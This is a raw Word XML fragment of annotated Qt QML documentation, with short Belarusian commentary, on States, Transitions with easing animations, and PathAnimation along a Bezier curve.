        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2221" w:name="_Toc483001010"/>
      <w:bookmarkStart w:id="2222" w:name="_Toc483004001"/>
      <w:bookmarkStart w:id="2223" w:name="_Toc483604351"/>
      <w:bookmarkStart w:id="2224" w:name="_Toc483605571"/>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>States</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2221"/>
      <w:bookmarkEnd w:id="2222"/>
      <w:bookmarkEnd w:id="2223"/>
      <w:bookmarkEnd w:id="2224"/>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRP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States</w:t>
      </w:r>
      <w:r w:rsidR="003C7638">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demonstrates how the properties of an item can vary between</w:t>
      </w:r>
      <w:r w:rsidR="003C7638">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2541" w:history="1">
        <w:r w:rsidRPr="00230BC0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>states</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It defines several states:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7638" w:rsidRPr="003C7638" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Прасцейшы</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="002230B8">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>прыклад</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="002230B8">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="002230B8">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">якім лёгка разабрацца. Важна адзначыць, што стан характаразуе цалкам увесь </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файл.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// In state 'middleRight', move the image to middleRightRect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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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name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"middleRight"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PropertyChanges</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target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userIcon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middleRightRect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middleRightRect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y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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// In state 'bottomLeft', move the image to bottomLeftRect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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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name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"bottomLeft"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PropertyChanges</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target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userIcon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bottomLeftRect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bottomLeftRect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y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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2225" w:name="_Toc483001011"/>
      <w:bookmarkStart w:id="2226" w:name="_Toc483004002"/>
      <w:bookmarkStart w:id="2227" w:name="_Toc483604352"/>
      <w:bookmarkStart w:id="2228" w:name="_Toc483605572"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2225"/>
      <w:bookmarkEnd w:id="2226"/>
      <w:bookmarkEnd w:id="2227"/>
      <w:bookmarkEnd w:id="2228"/>
    </w:p>
    <w:p w:rsid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Transitions</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>takes the States example and animates the property changes by setting transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F127A9" w:rsidRPr="00F127A9" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад абсалютна зразумелы. Цікава толькі існаванне </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> па змоўчанні //</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Transitions define how the properties change when the item moves between each state</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transitions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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// When transitioning to 'middleRight' move x,y over a duration of 1 second,</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// with OutBounce easing function.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transition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D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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to</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"middleRight</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>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NumberAnimation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properties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"x,y"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type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Easing</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OutBounce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1000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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// When transitioning to 'bottomLeft' move x,y over a duration of 2 seconds,</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// with InOutQuad easing function.</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Transition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"bottomLeft"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NumberAnimation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properties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"x,y"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type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Easing</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InOutQuad</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2000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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// For any other state changes move x,y linearly over duration of 200ms.</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Transition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NumberAnimation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properties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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"x,y"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200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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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E1023E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2229" w:name="pathanimation"/>
      <w:bookmarkStart w:id="2230" w:name="_Toc483001012"/>
      <w:bookmarkStart w:id="2231" w:name="_Toc483004003"/>
      <w:bookmarkStart w:id="2232" w:name="_Toc483604353"/>
      <w:bookmarkStart w:id="2233" w:name="_Toc483605573"/>
      <w:bookmarkEnd w:id="2229"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathAnimation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2230"/>
      <w:bookmarkEnd w:id="2231"/>
      <w:bookmarkEnd w:id="2232"/>
      <w:bookmarkEnd w:id="2233"/>
    </w:p>
    <w:p w:rsid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PathAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animates an image along a bezier curve using a</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2542" w:anchor="pathanimation" w:history="1">
        <w:r w:rsidRPr="00230BC0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F127A9" w:rsidRPr="00F127A9" w:rsidRDefault="00E1023E" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Тут</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>выкарысто</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">ўваюць тып </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, прызначаны для малявання сродкамі </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Java Scri</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pt.</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PauseAnimation</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="001B3733">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathCubic</w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="001B3733">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00F127A9" w:rsidRPr="00F127A9">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>элементы, якія непасрэдна забяспечваюць шляхі.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="001B3733"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be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PathAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="001B3733"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be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pathAnim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="001B3733"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be-BY"/>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1B3733">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
